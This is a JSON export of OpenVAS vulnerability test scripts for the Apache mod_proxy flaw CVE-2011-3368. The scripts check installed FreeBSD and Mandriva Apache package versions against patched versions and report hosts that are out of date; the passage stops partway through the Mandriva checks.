{"openvas": [{"lastseen": "2017-07-02T21:10:52", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2012-02-13T00:00:00", "type": "openvas", "title": "FreeBSD Ports: apache", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2017-04-18T00:00:00", "id": "OPENVAS:70600", "href": "http://plugins.openvas.org/nasl.php?oid=70600", "sourceData": "#\n#VID d8c901ff-0f0f-11e1-902b-20cf30e32f6d\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID d8c901ff-0f0f-11e1-902b-20cf30e32f6d\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n apache\n apache+ssl\n apache+ipv6\n apache+mod_perl\n apache+mod_ssl\n apache+mod_ssl+ipv6\n ru-apache-1.3\n ru-apache+mod_ssl\n\nCVE-2011-3368\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://httpd.apache.org/security/vulnerabilities_13.html\nhttp://seclists.org/fulldisclosure/2011/Oct/232\nhttp://www.vuxml.org/freebsd/d8c901ff-0f0f-11e1-902b-20cf30e32f6d.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(70600);\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-18 11:02:14 +0200 (Tue, 18 Apr 2017) $\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3368\");\n script_version(\"$Revision: 5963 $\");\n script_name(\"FreeBSD Ports: apache\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43.1.59_2\")<0) {\n txt += 'Package apache+ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_perl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache+mod_perl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.41+2.8.31_4\")<0) {\n txt += 'Package apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.41+2.8.31_4\")<0) {\n txt += 'Package apache+mod_ssl+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-apache-1.3\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43+30.23_1\")<0) {\n txt += 'Package ru-apache-1.3 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43+30.23_1\")<0) {\n txt += 'Package ru-apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:54", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "cvss3": {}, "published": "2012-02-13T00:00:00", "type": "openvas", "title": "FreeBSD Ports: apache", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2018-10-05T00:00:00", "id": "OPENVAS:136141256231070600", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070600", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_apache19.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID d8c901ff-0f0f-11e1-902b-20cf30e32f6d\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70600\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3368\");\n script_version(\"$Revision: 11762 $\");\n script_name(\"FreeBSD Ports: apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following packages are affected:\n\n apache\n apache+ssl\n apache+ipv6\n apache+mod_perl\n apache+mod_ssl\n apache+mod_ssl+ipv6\n ru-apache-1.3\n ru-apache+mod_ssl\n\nCVE-2011-3368\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://httpd.apache.org/security/vulnerabilities_13.html\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/Oct/232\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/d8c901ff-0f0f-11e1-902b-20cf30e32f6d.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43.1.59_2\")<0) {\n txt += 'Package apache+ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+mod_perl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache+mod_perl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.41+2.8.31_4\")<0) {\n txt += 'Package apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+mod_ssl+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.41+2.8.31_4\")<0) {\n txt += 'Package apache+mod_ssl+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"ru-apache-1.3\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43+30.23_1\")<0) {\n txt += 'Package ru-apache-1.3 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"ru-apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43+30.23_1\")<0) {\n txt += 'Package ru-apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-10-10T00:00:00", "type": "openvas", "title": "Mandriva Update for apache MDVSA-2011:144 (apache)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310831460", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831460", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apache MDVSA-2011:144 (apache)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-10/msg00017.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831460\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-10 16:05:48 +0200 (Mon, 10 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"MDVSA\", value:\"2011:144\");\n script_cve_id(\"CVE-2011-3368\");\n script_name(\"Mandriva Update for apache MDVSA-2011:144 (apache)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(mes5|2010\\.1|2009\\.0)\");\n script_tag(name:\"affected\", value:\"apache on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"A vulnerability has been discovered and corrected in apache:\n\n The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\n interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern\n matches for configuration of a reverse proxy, which allows remote\n attackers to send requests to intranet servers via a malformed URI\n containing an initial \\@ (at sign) character (CVE-2011-3368).\n\n Packages for 2009.0 are provided as of the Extended Maintenance\n Program. The updated packages have been patched to correct this issue.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_scgi\", rpm:\"apache-mod_proxy_scgi~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_reqtimeout\", rpm:\"apache-mod_reqtimeout~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", 